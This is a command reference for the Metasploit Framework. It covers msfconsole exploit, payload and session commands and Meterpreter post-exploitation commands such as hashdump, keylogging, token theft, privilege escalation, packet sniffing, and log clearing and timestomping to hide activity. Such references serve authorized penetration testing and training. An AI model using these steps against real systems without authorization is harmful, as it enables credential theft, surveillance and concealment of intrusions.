Using the Metasploit Framework

MSFconsole Commands

  • Show all exploits:

show exploits
  • Show all payloads:

show payloads
  • Show all auxiliary modules:

show auxiliary
  • Search for a module:

search <name>
  • Show information about a specific module:

info
  • Load an exploit or module:

use <name>
  • Load an exploit by index number:

use <number>
  • Set Local Host IP (LHOST):

set LHOST <ip>
  • Set Remote Host IP (RHOST):

set RHOST <ip>
  • Set a specific option value:

set <option> <value>
  • Set a global option value:

setg <option> <value>
  • Display available options for a module:

show options
  • Display supported platforms for the exploit:

show targets
  • Specify the target index:

set target <number>
  • Set the desired payload:

set payload <payload>
  • Display advanced options for a module:

show advanced
  • Automatically migrate to another process after exploitation:

set autorunscript migrate -f
  • Check if a target is vulnerable:

check
  • Execute the module or exploit:

exploit
  • Run the exploit in the background:

exploit -j
  • Run without interacting with the session:

exploit -z
  • Specify a payload encoder:

exploit -e <encoder>
  • Display help for the exploit command:

exploit -h
  • List available sessions:

sessions -l
  • List sessions with verbose details:

sessions -v
  • Run a script on all live sessions:

sessions -s <script>
  • Kill all active sessions:

sessions -K
  • Run a command across all sessions:

sessions -c <cmd>
  • Upgrade a shell to a Meterpreter session:

sessions -u <sessionID>
  • Create a new database:

db_create <name>
  • Connect to an existing database:

db_connect <name>
  • Use Nmap and store results in the database:

db_nmap <args>
  • Delete the current database:

db_destroy

Meterpreter Commands

  • Display Meterpreter help:

help
  • Run a Meterpreter script:

run <scriptname>
  • Show target system information:

sysinfo
  • List files and directories:

ls
  • Load the privilege extension:

use priv
  • List running processes:

ps
  • Migrate to a specific process by ID:

migrate <pid>
  • Load incognito functions:

use incognito
  • List user tokens:

list_tokens -u
  • List group tokens:

list_tokens -g
  • Impersonate a token:

impersonate_token <DOMAIN\\USERNAME>
  • Steal a process token:

steal_token <pid>
  • Stop token impersonation:

drop_token
  • Attempt privilege escalation to SYSTEM:

getsystem
  • Drop into an interactive shell:

shell
  • Run a command interactively:

execute -f <cmd.exe> -i
  • Revert to the original user:

rev2self
  • Interact with the registry:

reg <command>
  • Switch to another desktop:

setdesktop <number>
  • Capture a screenshot:

screenshot
  • Upload a file to the target:

upload <file>
  • Download a file from the target:

download <file>
  • Start keylogging:

keyscan_start
  • Dump captured keystrokes:

keyscan_dump
  • Stop keylogging:

keyscan_stop
  • Get available privileges:

getprivs
  • Take control of input devices:

uictl enable <keyboard/mouse>
  • Background the current session:

background
  • Dump password hashes:

hashdump
  • Load the sniffer module:

use sniffer
  • List network interfaces:

sniffer_interfaces
  • Start sniffing on an interface:

sniffer_start <id> <packet-buffer>
  • Dump captured packets:

sniffer_dump <id> <filename>
  • Stop packet sniffing:

sniffer_stop <id>
  • Clear event logs:

clearev
  • Modify file timestamps:

timestomp
  • Reboot the target machine:

reboot
